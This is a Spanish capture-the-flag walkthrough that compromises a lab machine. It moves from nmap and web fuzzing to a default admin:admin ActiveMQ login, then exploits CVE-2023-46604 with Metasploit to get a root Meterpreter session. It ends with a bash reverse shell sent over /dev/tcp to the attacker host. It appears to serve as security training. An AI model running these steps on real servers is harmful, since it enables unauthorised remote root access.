# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -vvv -oN nmap 172.17.0.2

Discovered open port 443/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 5672/tcp on 172.17.0.2
Discovered open port 61614/tcp on 172.17.0.2
Discovered open port 41693/tcp on 172.17.0.2
Discovered open port 61613/tcp on 172.17.0.2
Discovered open port 8161/tcp on 172.17.0.2
Discovered open port 61616/tcp on 172.17.0.2
Discovered open port 1883/tcp on 172.17.0.2

vemos que existen muchos servicios corriendo, comenzaremos haciendo algo de fuzzing a ver que conseguimos 

# Fuzzing web

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10701]
/https                (Status: 301) [Size: 308] [--> http://172.17.0.2/https/]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

revise e inspeccione el codigo fuente pero no vi nada, asi que sigo haciendo fuzzing pero por el puerto 443
intente usar gobuster pero me daba error asi que use wfuzz

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "https://172.17.0.2/FUZZ" --hc 404

000000287:   301        9 L      28 W       311 Ch      "assets"                                                                                               
000041849:   200        161 L    543 W      7219 Ch     "https://172.17.0.2/"                                                                                  
000089181:   403        9 L      28 W       276 Ch      "server-status" 

tras chequear no consigo nada de interes... asi que al volver a revisar mas detalladamente el reporte de nmap me consigo que en el puerto 8161
esta corriendo un servicio web asi que lo chequeo:
solocita credenciales asi que probando credenciales comunes, termino accediendo con admin:admin

y me encuentro con ActiveMQ que tiene la version 5.15.15 asi que al buscar informacion en internet
me consigo un cve: CVE-2023-46604, al buscar informacion de este cve veo que es posible la CRE y que Metasploit lo podemos 
usar asi que nos vamos a
metasploit 

msfconsole -q
search CVE-2023-46604

==========================================================================================================================================================
Matching Modules
================

   #  Name                                                   Disclosure Date  Rank       Check  Description
   -  ----                                                   ---------------  ----       -----  -----------
   0  exploit/multi/misc/apache_activemq_rce_cve_2023_46604  2023-10-27       excellent  Yes    Apache ActiveMQ Unauthenticated Remote Code Execution
   1    \_ target: Windows                                   .                .          .      .
   2    \_ target: Linux                                     .                .          .      .
   3    \_ target: Unix                                      .                .          .      .

============================================================================================================================================================

use 2 
show options

aqui nos muestra las configuraciones, pero aqui vamos a setear los siguientes valores:

set RHOSTS 172.17.0.2				| ip objetivo
set SRVHOST 172.17.0.1				| nuestra ip ya que es la ip donde estara el recurso que necesitara la maquina objetivo
set LHOST 172.17.0.1				| nuestra ip atacante para recibir la session
set LPORT 443					| puerto por el cual estaremos en escucha
set FETCH_COMMAND WGET				| este valor estaba seteado con curl pero no me funciono asi que lo cambie a wget
exploit						| arrancamos el exploit

[*] Started reverse TCP handler on 172.17.0.1:443 
[*] 172.17.0.2:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.17.0.2:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.15
[*] 172.17.0.2:61616 - Using URL: http://172.17.0.1:8080/dtNu4DIuEgC
[*] 172.17.0.2:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 172.17.0.2:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:443 -> 172.17.0.2:52372) at 2024-08-31 15:02:44 -0400
[*] 172.17.0.2:61616 - Server stopped.

meterpreter > getuid
Server username: root

somos directamente root, no necesitamos hacer mas nada pero yo me enviare una reverse shell y me pondre en escucha por netcat

============================
desde mi maquina atacante
nc -lnvp 444 
============================

meterpreter > bash -c "/bin/bash -i >& /dev/tcp/172.17.0.1/444 0>&1" 
=========================================================================

root@dc1ee82f0296:/# 
